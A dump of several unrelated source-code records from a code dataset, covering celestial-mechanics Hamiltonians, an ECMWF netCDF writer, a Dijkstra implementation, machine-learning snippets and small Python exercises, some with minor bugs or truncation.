'kvec', which specifies the cosine argument\n and 'zvec', which specfies the order of inclination and\n eccentricities in the Taylor expansion of the \n cosine coefficient. 
\n \"\"\"\n if (indexIn,indexOut,(kvec,zvec)) in self.resonance_indices:\n warnings.warn(\"Monomial term alread included Hamiltonian; no new term added.\")\n return\n G = symbols('G')\n mIn,muIn,MIn,LambdaIn,lambdaIn,kappaIn,etaIn,sigmaIn,rhoIn = symbols('m{0},mu{0},M{0},Lambda{0},lambda{0},kappa{0},eta{0},sigma{0},rho{0}'.format(indexIn)) \n mOut,muOut,MOut,LambdaOut,lambdaOut,kappaOut,etaOut,sigmaOut,rhoOut = symbols('m{0},mu{0},M{0},Lambda{0},lambda{0},kappa{0},eta{0},sigma{0},rho{0}'.format(indexOut)) \n \n alpha = self.particles[indexIn].a/self.state.particles[indexOut].a\n\t# aIn = LambdaIn * LambdaIn / mIn / mIn / G / MIn\n\t# aOut = LambdaOut * LambdaOut / mOut / mOut / G / MOut\n # alpha = aIn/aOut\n # Resonance components\n #\n k1,k2,k3,k4,k5,k6 = kvec\n z1,z2,z3,z4 = zvec\n C = get_DFCoeff_symbol(k1,k2,k3,k4,k5,k6,z1,z2,z3,z4,indexIn,indexOut)\n C_dict = DFCoeff_C(k1,k2,k3,k4,k5,k6,z1,z2,z3,z4)\n C_val = eval_DFCoeff_dict(C_dict,alpha)\n self.Hparams[C] = C_val\n rtLIn = sqrt(LambdaIn)\n rtLOut = sqrt(LambdaOut)\n xin,yin = get_re_im_components(kappaIn/rtLIn ,-etaIn / rtLIn,k3)\n xout,yout = get_re_im_components( kappaOut/rtLOut, -etaOut/rtLOut,k4)\n uin,vin = get_re_im_components(sigmaIn/rtLIn/2, -rhoIn/rtLIn/2,k5)\n uout,vout = get_re_im_components(sigmaOut/rtLOut/2, -rhoOut/rtLOut/2,k6)\n\n re = uin*uout*xin*xout - vin*vout*xin*xout - uout*vin*xout*yin - uin*vout*xout*yin - uout*vin*xin*yout - uin*vout*xin*yout - uin*uout*yin*yout + vin*vout*yin*yout\n im = uout*vin*xin*xout + uin*vout*xin*xout + uin*uout*xout*yin - vin*vout*xout*yin + uin*uout*xin*yout - vin*vout*xin*yout - uout*vin*yin*yout - uin*vout*yin*yout\n \n GammaIn = (kappaIn*kappaIn + etaIn*etaIn)/2\n GammaOut = (kappaOut*kappaOut + etaOut*etaOut)/2\n QIn = (sigmaIn*sigmaIn + rhoIn*rhoIn)/2\n QOut = (sigmaOut*sigmaOut + rhoOut*rhoOut)/2\n \n eIn_sq_term = (2 * GammaIn / LambdaIn )**z3\n eOut_sq_term = (2 * GammaOut / LambdaOut )**z4\n incIn_sq_term = ( QIn / LambdaIn / 2 )**z1\n 
incOut_sq_term = ( QOut / LambdaOut / 2 )**z2\n \n # Update internal Hamiltonian\n aOut_inv = G*MOut*muOut*muOut / LambdaOut / LambdaOut \n prefactor1 = -G * mIn * mOut * aOut_inv\n prefactor2 = eIn_sq_term * eOut_sq_term * incIn_sq_term * incOut_sq_term \n trig_term = re * cos(k1 * lambdaOut + k2 * lambdaIn) - im * sin(k1 * lambdaOut + k2 * lambdaIn) \n \n # Keep track of resonances\n self.resonance_indices.append((indexIn,indexOut,(kvec,zvec)))\n \n self.H += prefactor1 * C * prefactor2 * trig_term\n if update:\n self._update()\n \n def add_all_MMR_and_secular_terms(self,p,q,max_order,indexIn = 1, indexOut = 2):\n \"\"\"\n Add all disturbing function terms associated with a p:p-q mean\n motion resonance along with secular terms up to a given order.\n\n Arguments\n ---------\n p : int\n Coefficient of lambdaOut in resonant argument\n j*lambdaOut - (j-k)*lambdaIn\n q : int\n Order of the mean motion resonance.\n\n \"\"\"\n assert max_order>=0, \"max_order= {:d} not allowed, must be non-negative.\".format(max_order)\n if p=0, \"max_order= {:d} not allowed, must be non-negative.\".format(max_order)\n if p=0, \"max_order= {:d} not allowed, must be non-negative.\".format(max_order)\n raise RuntimeError(\"THIS METHOD NEEDS TO BE FIXED!!!\")\n max_order_by_2 = max_order//2\n max_order_by_4 = max_order//4\n for a in range(0,max_order_by_4+1):\n b_hi = max_order_by_2 - 2 * a\n if a==0:\n b_lo = 0\n else:\n b_lo = -b_hi\n for b in range(b_lo,b_hi+1):\n c_hi = max_order_by_2 - abs(b) - 2 * a\n if a == 0 and b ==0:\n c_lo = 0\n else:\n c_lo = -c_hi\n for c in range(c_lo,c_hi+1):\n k3 = a-b\n k4 = a+b\n k5 = -c-a\n k6 = c-a\n self.add_cos_term_to_max_order([0,0,k3,k4,k5,k6],max_order,indexIn,indexOut,update=False)\n\n # finish with update\n self._update()\n\n def add_cos_term_to_max_order(self,jvec,max_order,indexIn=1,indexOut=2,update = True):\n \"\"\"\n Add disturbing function term \n c(alpha,e1,e2,s1,s2) * cos(j1 * lambda + j2 * lambda1 + j3 * pomega1 + j4 * pomega2 + j5 * 
Omega1 + j6 * Omega2)\n approximating c up to order 'max_order' in eccentricity and inclination.\n\n Arguments\n ---------\n jvec : array-like\n Vector of integers specifying cosine argument.\n max_order : int\n Maximum order of terms in include in the expansion of c\n indexIn : int, optional\n Integer index of inner planet.\n indexOut : anit, optional\n Intgeger index of outer planet.\n \"\"\"\n _,_,j3,j4,j5,j6 = jvec\n order = max_order - abs(j3) - abs(j4) - abs(j5) - abs(j6)\n orderBy2 = order // 2\n N = orderBy2+1\n for z1 in range(0,N):\n for z2 in range(0,N - z1):\n for z3 in range(0,N - z1 - z2):\n for z4 in range(0,N - z1 - z2 - z3):\n zvec = [z1,z2,z3,z4]\n self.add_monomial_term(jvec,zvec,indexIn,indexOut,update=False)\n if update:\n self._update() \n\n def _get_laplace_lagrange_matrices(self):\n set_e_and_inc_zero_rule = {\n S('{0}{1}'.format(var,i)):0\n for i in range(1,self.N)\n for var in ['eta','kappa','rho','sigma']\n }\n mtrx = []\n for s1 in [S('eta{}'.format(i)) for i in range(1,self.N)]:\n row = []\n for s2 in [S('kappa{}'.format(i)) for i in range(1,self.N)]:\n entry= diff(self.derivs[s1],s2)\n row.append(entry.subs(set_e_and_inc_zero_rule))\n mtrx.append(row)\n ecc_mtrx = Matrix(mtrx)\n mtrx = []\n for s1 in [S('rho{}'.format(i)) for i in range(1,self.N)]:\n row = []\n for s2 in [S('sigma{}'.format(i)) for i in range(1,self.N)]:\n entry= diff(self.derivs[s1],s2)\n row.append(entry.subs(set_e_and_inc_zero_rule))\n mtrx.append(row)\n inc_mtrx = Matrix(mtrx)\n return ecc_mtrx,inc_mtrx\n","sub_path":"celmech/poincare.py","file_name":"poincare.py","file_ext":"py","file_size_in_byte":25689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"525188489","text":"def filter_manager(data):\n filtered_data = get_trends(data)\n final_fata = time_construct(filtered_data)\n return final_fata\n\n\ndef get_trends(data):\n trends = {\"Data\": []}\n\n index = 0\n for i in range(len(data[\"Data\"])):\n for j, k 
in data[\"Data\"][i].items():\n trends[\"Data\"].append({\"Index\": index+1})\n for m, n in k.items():\n trends[\"Data\"][index].update({m: n})\n index += 1\n\n return trends\n\n\ndef time_construct(data):\n trends = {\"Data\": []}\n\n for i in range(len(data[\"Data\"])):\n trends[\"Data\"].append({})\n for j, k in data[\"Data\"][i].items():\n if j != \"Time Query\":\n trends[\"Data\"][i].update({j: k})\n else:\n trends[\"Data\"][i].update({\"Date Query\": k[:10]})\n\n # adjusting time zone, with less three hours. UGLY, I know...\n time = k[11:19]\n hour = int(time[:2])\n hour = (hour-3) % 24\n if hour < 10:\n time = f\"0{hour}\" + time[2:]\n else:\n time = f\"{hour} \" + time[2:]\n trends[\"Data\"][i].update({\"Time Query\": time})\n\n return trends\n","sub_path":"a_data_processing/Twitter/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"219288094","text":"#! /usr/bin/env python2.7\n# -*- coding: utf-8 -*-\n#\n# pySpatialETL is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# any later version.\n#\n# pySpatialETL is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# Author : Fabien Rétif - fabien.retif@zoho.com\n#\nimport math\n\nfrom netCDF4 import Dataset\nfrom netCDF4 import date2num\nfrom numpy import float32\nfrom numpy import float64\n\nfrom spatialetl.coverage.io.CoverageWriter import CoverageWriter\n\n\nclass AcademicECMWFWriter (CoverageWriter):\n\n def __init__(self, myFile,\n lon,\n lat,\n times,\n wind_speed=0,\n wind_from_direction_angle=0,\n surface_air_pressure=1013.25, # Pression MSL\n sea_surface_air_pressure=1013.25, # Pression MSL\n surface_air_temperature=283.15, # 10°C\n dewpoint_temperature=283.15, # 10°C\n surface_downward_sensible_heat_flux=0,\n surface_downward_latent_heat_flux=0,\n surface_downward_solar_radiation=0,\n surface_downward_thermal_radiation=0,\n surface_solar_radiation=0,\n surface_thermal_radiation=0,\n total_rain=0,\n update=False):\n CoverageWriter.__init__(self,None,myFile);\n self.x_axis = lon;\n self.y_axis= lat;\n self.t_axis = times\n self.wind_speed = wind_speed\n self.wind_from_direction_angle = wind_from_direction_angle\n self.surface_air_pressure = surface_air_pressure\n self.sea_surface_air_pressure = sea_surface_air_pressure\n self.surface_downward_sensible_heat_flux = surface_downward_sensible_heat_flux\n self.surface_downward_latent_heat_flux = surface_downward_latent_heat_flux\n self.surface_air_temperature = surface_air_temperature\n self.dewpoint_temperature = dewpoint_temperature\n self.surface_downward_solar_radiation = surface_downward_solar_radiation\n self.surface_solar_radiation = surface_solar_radiation\n self.surface_thermal_radiation = surface_thermal_radiation\n self.surface_downward_thermal_radiation = surface_downward_thermal_radiation\n self.total_rain=total_rain\n self.ncfile = None\n self.update = update;\n\n if self.update == False :\n self.ncfile = Dataset(self.filename, 'w', format='NETCDF4')\n else:\n self.ncfile = Dataset(self.filename, 'r+', format='NETCDF4')\n\n self.ncfile.description = 
'ECMWF Writer. Generated with pySpatialETL'\n\n if self.update == False:\n # dimensions\n self.ncfile.createDimension('time', None)\n self.ncfile.createDimension('lat', len(self.y_axis))\n self.ncfile.createDimension('lon', len(self.x_axis))\n\n # variables\n times = self.ncfile.createVariable('time', float64, ('time',))\n times.units= 'seconds since 2008-01-29 00:00:00'\n times.calendar= 'gregorian'\n times.standard_name= 'time'\n times.axis='T'\n times.conventions = \"UTC time\"\n\n latitudes = self.ncfile.createVariable('lat', float32, ('lat',))\n latitudes.units = \"degree_north\" ;\n latitudes.long_name = \"latitude\" ;\n latitudes.standard_name = \"latitude\" ;\n latitudes.valid_min = -90.0;\n latitudes.valid_max = 90.0 ;\n latitudes.axis = \"Y\" ;\n\n longitudes = self.ncfile.createVariable('lon', float32, ('lon',))\n longitudes.units = \"degree_east\" ;\n longitudes.long_name = \"longitude\" ;\n longitudes.standard_name = \"longitude\" ;\n longitudes.valid_min = -180.0 ;\n longitudes.valid_max = 180.0 ;\n longitudes.axis = \"X\" ;\n\n # data\n latitudes[:] = self.y_axis;\n longitudes[:] = self.x_axis;\n times[:] = date2num(self.t_axis,units = times.units, calendar = times.calendar);\n\n def close(self):\n self.ncfile.close()\n\n def write_variable_3D_mask(self):\n\n var = self.ncfile.createVariable('LSM', float32, ('time', 'lat', 'lon',), fill_value=9.96921e+36)\n var.long_name = \"Land/sea mask\";\n var.code = 172;\n var.table = 128;\n var[::] = 0\n\n def write_variable_surface_pressure(self):\n\n if self.update == False:\n var = self.ncfile.createVariable('SP', float32, ('time', 'lat', 'lon',), fill_value=9.96921e+36)\n var.long_name = \"Surface pressure\";\n var.code = 134;\n var.table = 128;\n var.units = \"Pa\";\n else:\n var = self.ncfile.variables['SP'];\n\n var[:] = self.surface_air_pressure*100;\n\n def write_variable_sea_surface_air_pressure(self):\n\n if self.update == False:\n var = self.ncfile.createVariable('MSL', float32, ('time', 'lat', 
'lon',), fill_value=9.96921e+36)\n var.long_name = \"Sea surface air pressure\";\n var.code = 134;\n var.table = 128;\n var.units = \"Pa\";\n else:\n var = self.ncfile.variables['MSL'];\n\n var[:] = self.sea_surface_air_pressure*100;\n\n def write_variable_wind(self):\n\n if self.update == False:\n data_u = self.ncfile.createVariable('U10M', float32, ('time', 'lat', 'lon',), fill_value=9.96921e+36)\n data_u.long_name = \"10 metre U wind component\";\n data_u.code = 147;\n data_u.table = 128;\n data_u.units = \"m s**-1\";\n\n data_v = self.ncfile.createVariable('V10M', float32, ('time', 'lat', 'lon',), fill_value=9.96921e+36)\n data_v.long_name = \"10 metre V wind component\";\n data_v.code = 147;\n data_v.table = 128;\n data_v.units = \"m s**-1\";\n else :\n data_u = self.ncfile.variables['U10M']\n data_v = self.ncfile.variables['V10M']\n\n #data_u[:] = 270. - (math.degrees(self.wind_speed*math.sin(math.radians(self.wind_to_direction_angle)))) + 180.0 % 360.0\n #data_v[:] = 270. - (math.degrees(self.wind_speed*math.cos(math.radians(self.wind_to_direction_angle)) + 180.0 % 360.0\n\n data_u[:] = self.wind_speed * math.sin(math.radians((self.wind_from_direction_angle + 180.0) % 360.0))\n data_v[:] = self.wind_speed * math.cos(math.radians((self.wind_from_direction_angle + 180.0) % 360.0))\n\n def write_variable_surface_downward_sensible_heat_flux(self):\n\n if self.update == False:\n var = self.ncfile.createVariable('SSHF', float32, ('time', 'lat', 'lon',), fill_value=9.96921e+36)\n var.long_name = \"Surface sensible heat flux\";\n var.code = 146;\n var.table = 128;\n var.units = \"W m**-2 s\";\n else:\n var = self.ncfile.variables['SSHF']\n\n var[:] = self.surface_downward_sensible_heat_flux;\n\n def write_variable_surface_downward_latent_heat_flux(self):\n\n var = self.ncfile.createVariable('SLHF', float32, ('time', 'lat', 'lon',), fill_value=9.96921e+36)\n var.long_name = \"Surface latent heat flux\";\n var.code = 147;\n var.table = 128;\n var.units = \"W m**-2 
s\";\n var[:] = self.surface_downward_latent_heat_flux;\n\n def write_variable_surface_air_temperature(self):\n\n var = self.ncfile.createVariable('T2M', float32, ('time', 'lat', 'lon',), fill_value=9.96921e+36)\n var.long_name = \"2 metre temperature\";\n var.code = 167;\n var.table = 128;\n var.units = \"K\";\n var[:] = self.surface_air_temperature;\n\n def write_variable_dewpoint_temperature(self):\n\n var = self.ncfile.createVariable('D2M', float32, ('time', 'lat', 'lon',), fill_value=9.96921e+36)\n var.long_name = \"2 metre dewpoint temperature\";\n var.code = 168;\n var.table = 128;\n var.units = \"K\";\n # Value\n var[:] = self.dewpoint_temperature;\n\n def write_variable_surface_downward_solar_radiation(self):\n\n var = self.ncfile.createVariable('SSRD', float32, ('time', 'lat', 'lon',), fill_value=9.96921e+36)\n var.long_name = \"Surface solar radiation downwards\";\n var.code = 169;\n var.table = 128;\n var.units = \"W m**-2 s\";\n var[:] = self.surface_downward_solar_radiation;\n\n def write_variable_surface_downward_thermal_radiation(self):\n\n var = self.ncfile.createVariable('STRD', float32, ('time', 'lat', 'lon',), fill_value=9.96921e+36)\n var.long_name = \"Surface thermal radiation downwards\";\n var.code = 175;\n var.table = 128;\n var.units = \"W m**-2 s\";\n var[:] = self.surface_downward_thermal_radiation;\n\n def write_variable_surface_solar_radiation(self):\n\n var = self.ncfile.createVariable('SSR', float32, ('time', 'lat', 'lon',), fill_value=9.96921e+36)\n var.long_name = \"Surface solar radiation\";\n var.code = 176;\n var.table = 128;\n var.units = \"W m**-2 s\";\n var[:] = self.surface_solar_radiation;\n\n def write_variable_surface_thermal_radiation(self):\n\n var = self.ncfile.createVariable('STR', float32, ('time', 'lat', 'lon',), fill_value=9.96921e+36)\n var.long_name = \"Surface thermal radiation\";\n var.code = 177;\n var.table = 128;\n var.units = \"W m**-2 s\";\n var[:] = self.surface_thermal_radiation;\n\n def 
write_variable_rainfall_amount(self):\n\n var = self.ncfile.createVariable('TP', float32, ('time', 'lat', 'lon',), fill_value=9.96921e+36)\n var.long_name = \"Total precipitation\";\n var.code = 228;\n var.table = 128;\n var.units = \"m\";\n var[:] = self.total_rain;","sub_path":"spatialetl/coverage/io/netcdf/ecmwf/AcademicECMWFWriter.py","file_name":"AcademicECMWFWriter.py","file_ext":"py","file_size_in_byte":10042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"364071458","text":"# 整型\n# 定义:年龄、手机号码、身份证(X除外)\na = 1 # a = int(1)\n\n# b = '12'\n# print(type(b))\n# b = int(b)\n# print(type(b))\n\n# 浮点型\n# 定义:体重、升高、薪资\n\nf1 = 1.9 # f1 = float(1.9)\n# print(type(f1))\n#\n# f2 = '1.9'\n# f2 = float(f2)\n# print(type(f2))\n\n# f2 = int(f2)\n# print(f2)\n# print(type(f2))\n\n# 复数\n\"\"\"\n>>> a = 1-2j\n>>> a\n(1-2j)\n>>> type(a)\n\n>>>\n>>>\n>>> a.real\n1.0\n>>> a.imag\n-2.0\n>>>\n\"\"\"\n\n\n# python2与python3的区别\n\n\"\"\"\npython2\n这个范围[-24xxxxxxxx,24xxxxxxxx],就叫int\n超过这个范围:long\n\npython3:\n没有长整型这么一说\n\"\"\"","sub_path":"2.python/0.python基础/day3/代码/数字类型.py","file_name":"数字类型.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"615575781","text":"from __future__ import generators\nfrom collections import defaultdict\n\nclass priorityDictionary(dict):\n def __init__(self):\n '''Initialize priorityDictionary by creating binary heap\nof pairs (value,key). 
Note that changing or removing a dict entry will\nnot remove the old pair from the heap until it is found by smallest() or\nuntil the heap is rebuilt.'''\n self.__heap = []\n dict.__init__(self)\n\n def smallest(self):\n '''Find smallest item after removing deleted items from heap.'''\n #if len(self) == 0:\n # raise IndexError, \"smallest of empty priorityDictionary\"\n heap = self.__heap\n while heap[0][1] not in self or self[heap[0][1]] != heap[0][0]:\n lastItem = heap.pop()\n insertionPoint = 0\n while 1:\n smallChild = 2*insertionPoint+1\n if smallChild+1 < len(heap) and \\\n heap[smallChild] > heap[smallChild+1]:\n smallChild += 1\n if smallChild >= len(heap) or lastItem <= heap[smallChild]:\n heap[insertionPoint] = lastItem\n break\n heap[insertionPoint] = heap[smallChild]\n insertionPoint = smallChild\n return heap[0][1]\n\n def __iter__(self):\n '''Create destructive sorted iterator of priorityDictionary.'''\n def iterfn():\n while len(self) > 0:\n x = self.smallest()\n yield x\n del self[x]\n return iterfn()\n\n def __setitem__(self,key,val):\n '''Change value stored in dictionary and add corresponding\npair to heap. 
Rebuilds the heap if the number of deleted items grows\ntoo large, to avoid memory leakage.'''\n dict.__setitem__(self,key,val)\n heap = self.__heap\n if len(heap) > 2 * len(self):\n self.__heap = [(v,k) for k,v in self.iteritems()]\n self.__heap.sort() # builtin sort likely faster than O(n) heapify\n else:\n newPair = (val,key)\n insertionPoint = len(heap)\n heap.append(None)\n while insertionPoint > 0 and \\\n newPair < heap[(insertionPoint-1)//2]:\n heap[insertionPoint] = heap[(insertionPoint-1)//2]\n insertionPoint = (insertionPoint-1)//2\n heap[insertionPoint] = newPair\n\n def setdefault(self,key,val):\n '''Reimplement setdefault to call our customized __setitem__.'''\n if key not in self:\n self[key] = val\n return self[key]\n\ndef dks(G, start, end):\n D = {}\t# dictionary of final distances\n p = {}\t# dictionary of predecessors\n Q = priorityDictionary() # est.dist. of non-final vert.\n Q[start] = 0\n\n for v in Q:\n D[v] = Q[v]\n if v == end: break\n for w in G[v]:\n vwLength = D[v] + G[v][w]\n if w in D:\n if vwLength < D[w]:\n raise(ValueError,\"Dijkstra: found better path to already-final vertex\")\n elif w not in Q or vwLength < Q[w]:\n Q[w] = vwLength\n P[w] = v\n return (D,P)\n\n\nfor _ in range(int(input())):\n n, m = [int(x) for x in input().split()]\n bridges = defaultdict(list)\n for _ in range(m):\n a, b = [int(x) for x in input().split()]\n bridges[a].append(b)\n bridges[b].append(a)\n d, p = dks(bridges,1, n)\n\n\n","sub_path":"Hackerrank/rocky_village.py","file_name":"rocky_village.py","file_ext":"py","file_size_in_byte":3425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"72806040","text":"import myutil as mu\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.utils.data import TensorDataset # 텐서데이터셋\nfrom torch.utils.data import DataLoader # 데이터로더\nfrom torch.utils.data import Dataset\nimport matplotlib.pyplot as plt # 
맷플롯립사용\nimport torchvision.datasets as dsets\nimport torchvision.transforms as transforms\nfrom torch.utils.data import DataLoader\nimport random\nfrom sklearn.datasets import load_digits\n\n################################################################################\n# - 다층 퍼셉트론으로 손글씨 분류하기\n# - 이번 챕터에서는 다층 퍼셉트론을 구현하고, 딥 러닝을 통해서 숫자 필기 데이터를 분류해봅시다.\n# - MNIST 데이터랑 다른 데이터입니다.\n\n################################################################################\n# - 숫자 필기 데이터 소개\n# - 숫자 필기 데이터는 사이킷런 패키지에서 제공하는 분류용 예제 데이터입니다.\n# - 0부터 9까지의 숫자를 손으로 쓴 이미지 데이터로 load_digits() 명령으로 로드할 수 있습니다.\n# - 각 이미지는 0부터 15까지의 명암을 가지는 8 × 8 = 64 픽셀 해상도의 흑백 이미지입니다.\n# - 그리고 해당 이미지가 1,797개가 있습니다.\n# - load_digits()를 통해 이미지 데이터를 로드할 수 있습니다.\n# - 로드한 전체 데이터를 digits에 저장합니다.\n\n\ndigits = load_digits()\nmu.log(\"len(digits.images)\", len(digits.images))\n\nimages_labels = list(zip(digits.images, digits.target))\nsub_sample_size = 20\n\nfor i, (image, label) in enumerate(images_labels[:sub_sample_size]):\n plt.subplot(4, 5, i + 1)\n plt.axis(\"off\")\n plt.imshow(image, cmap=plt.cm.gray_r, interpolation=\"nearest\")\n plt.title(\"label : {}\".format(label))\n\nplt.show()\n\n################################################################################\n# - 다층 퍼셉트론 분류기 만들기\n\n\nmodel = nn.Sequential(\n nn.Linear(64, 32), # input_layer = 64, hidden_layer1 = 32\n nn.ReLU(),\n nn.Linear(32, 16), # hidden_layer2 = 32, hidden_layer3 = 16\n nn.ReLU(),\n nn.Linear(16, 10) # hidden_layer3 = 16, output_layer = 10\n)\n\nmu.log(\"model\", model)\n\nX = digits.data # 이미지. 
즉, 특성 행렬\nY = digits.target # 각 이미지에 대한 레이블\n\nmu.log(\"len(X)\", len(X))\nmu.log(\"X[0].shape\", X[0].shape)\nmu.log(\"len(Y)\", len(Y))\nmu.log(\"Y[0].shape\", Y[0].shape)\n\nX = torch.tensor(X, dtype=torch.float32)\nY = torch.tensor(Y, dtype=torch.int64)\n\nloss_fn = nn.CrossEntropyLoss()\noptimizer = optim.Adam(model.parameters())\nnb_epochs = 100\nmu.plt_init()\n\nfor epoch in range(nb_epochs + 1):\n y_pred = model(X)\n loss = loss_fn(y_pred, Y)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n if epoch % 10 == 0:\n accuracy = mu.get_cross_entropy_accuracy(y_pred, Y)\n mu.log_epoch(epoch, nb_epochs, loss, accuracy)\n\nmu.plt_show()\n\nmu.log(\"model\", model)\n\n################################################################################\n# accuracy 측정\n\n\nwith torch.no_grad():\n prediction = model(X)\n accuracy = mu.get_cross_entropy_accuracy(prediction, Y)\n mu.log(\"accuracy\", accuracy)\n\n################################################################################\n# 랜덤 5 항목 테스트\n\n\nfor _ in range(5):\n print(\"-\" * 80)\n r = random.randint(0, len(X) - 1)\n mu.log(\"r\", r)\n X_single_data = X[r:r + 1]\n mu.log(\"X_single_data.shape\", X_single_data.shape)\n Y_single_data = Y[r:r + 1]\n mu.log(\"Y_single_data\", Y_single_data)\n single_prediction = model(X_single_data)\n mu.log(\"single_prediction\", single_prediction)\n single_prediction_res = torch.argmax(single_prediction, 1).item()\n mu.log(\"single_prediction_res\", single_prediction_res)\n mu.plt_img_show(X_single_data.view(8, 8))\n","sub_path":"0607_multi_layer_perceptron_sklearn.py","file_name":"0607_multi_layer_perceptron_sklearn.py","file_ext":"py","file_size_in_byte":3929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"487136406","text":"import argparse\nimport json\n\nimport numpy as np\n\ndef add_arguments(parser):\n parser.add_argument(\"--input_file\", help=\"path to input file\", required=True)\n 
parser.add_argument(\"--output_file\", help=\"path to output file\", required=True)\n parser.add_argument(\"--answer_threshold\", help=\"threshold of answer\", required=False, default=0.1, type=float)\n\ndef convert_coqa(input_file,\n output_file,\n answer_threshold):\n with open(input_file, \"r\") as file:\n input_data = json.load(file)\n \n output_data = []\n for data in input_data:\n id_items = data[\"qas_id\"].split('_')\n id = id_items[0]\n turn_id = int(id_items[1])\n \n prob_list = [data[\"unk_prob\"], data[\"yes_prob\"], data[\"no_prob\"]]\n answer_list = [\"unknown\", \"yes\", \"no\"]\n \n prob_idx = np.argmax(prob_list)\n if prob_list[prob_idx] >= answer_threshold:\n answer = answer_list[prob_idx]\n if answer == \"yes\" and \"true or false\" in data[\"question_text\"].lower():\n answer = \"true\"\n elif answer == \"no\" and \"true or false\" in data[\"question_text\"].lower():\n answer = \"false\"\n else:\n answer = data[\"predict_text\"]\n \n score = prob_list[prob_idx]\n \n output_data.append({\n \"id\": id,\n \"turn_id\": turn_id,\n \"answer\": answer,\n \"score\": score\n })\n \n with open(output_file, \"w\") as file:\n json.dump(output_data, file, indent=4)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n add_arguments(parser)\n args = parser.parse_args()\n convert_coqa(args.input_file, args.output_file, args.answer_threshold)\n","sub_path":"tool/convert_coqa.py","file_name":"convert_coqa.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"481432412","text":"import tensorflow as tf\nimport numpy as np\n\n\nx = tf.Variable(tf.random_normal([1,2,6,1]))\ny = tf.squeeze(x, axis=[0])\n\ninit = tf.global_variables_initializer()\n\nwith tf.Session() as sess:\n sess.run(init)\n\n print(\"x shape\", x.get_shape().as_list())\n print(\"y shape\", 
y.get_shape().as_list())\n","sub_path":"ga3c/test_tensorflow.py","file_name":"test_tensorflow.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"42402414","text":"#! /usr/bin/env python3\n\nfrom itertools import product\nimport sys\n\ntaxa_mut = [0.005, 0.010]\ntaxa_cruz = [0.95, 0.99]\ntam_pop = [200, 400, 800]\noperador_cruz = [0, 1]\noperador_mut = [0, 1]\nnumero_grupos = 1\n\ncombinacoes = list(product(tam_pop, taxa_cruz, operador_cruz, operador_mut,\n taxa_mut))\nnumero_combinacoes = len(combinacoes)\nprint('Numero de combinacoes: ', numero_combinacoes)\n\ncombinacoes_por_grupo = numero_combinacoes // numero_grupos\nprint('Combinacoes por grupo:', combinacoes_por_grupo)\n\n\ndef getid(c):\n return '.'.join(str(x) for x in c)\n\n\ndef comb2str(i, c):\n return 'ag ' + str(i) + '-' + getid(c) + ' ' + ' '.join(str(x) for x in c)\n\n\nid_grupo = int(sys.argv[1])\ncomeco_intervalo = id_grupo * combinacoes_por_grupo\nfim_intervalo = (id_grupo + 1) * combinacoes_por_grupo\n\nprint('Intervalo: [%d, %d)' % (comeco_intervalo, fim_intervalo))\n\nwith open('restantes.txt', 'w') as f:\n for i, c in enumerate(combinacoes[comeco_intervalo:fim_intervalo],\n comeco_intervalo):\n print(comb2str(i, c), file=f)\n\n","sub_path":"scripts/gerar_configuracoes_ag.py","file_name":"gerar_configuracoes_ag.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"61466472","text":"#!/usr/bin/env python3\n\n# Evaluating Code\n# Clarity first!\n# Maintainability (minimal repetition or dependencies)\n# Consistency (syntax, variable naming)\n# Brevity\n# At higher levels, and after the above:\n# Time efficiency\n# Memory efficiency\n\nclass MaxSizeList(object):\n def __init__(self, maxSize):\n self.l = []\n self.maxSize = maxSize\n\n def push(self, element):\n self.l.append(element)\n if (len(self.l) > 
self.maxSize):\n self.l.pop(0)\n\n def get_list(self):\n return self.l\n\na = MaxSizeList(3)\nb = MaxSizeList(1)\n\na.push(\"hey\")\na.push(\"hi\")\na.push(\"let's\")\na.push(\"go\")\n\nb.push(\"hey\")\nb.push(\"hi\")\nb.push(\"let's\")\nb.push(\"go\")\n\nprint(a.get_list())\nprint(b.get_list())\n","sub_path":"OOP/008. Assignment 1.py","file_name":"008. Assignment 1.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"453358786","text":"# 2. Посчитать четные и нечетные цифры введенного натурального числа.\n# Например, если введено число 34560, то у него 3 четные цифры (4, 6 и 0)\n# и 2 нечетные (3 и 5).\n\nEVEN_NUMS = 0\nODD_NUMS = 0\n\n\n# ---Цикл---\ndef counting_cycle(a):\n even_nums = 0\n odd_nums = 0\n while a != 0:\n numb = a % 10 # Получаем крайнее правое число\n a = a // 10 # Убираем крайнее правое число\n if numb % 2 == 0:\n even_nums += 1\n else:\n odd_nums += 1\n print(f'Кол-во четных чисел: {even_nums}\\n'\n f'Кол-во нечетных чисел: {odd_nums}')\n\n\n# ---Рекурсия---\ndef counting_req(a):\n global EVEN_NUMS, ODD_NUMS\n if a == 0:\n return print(f'Кол-во четных чисел: {EVEN_NUMS}\\n'\n f'Кол-во нечетных чисел: {ODD_NUMS}')\n numb = a % 10\n if numb % 2 == 0:\n 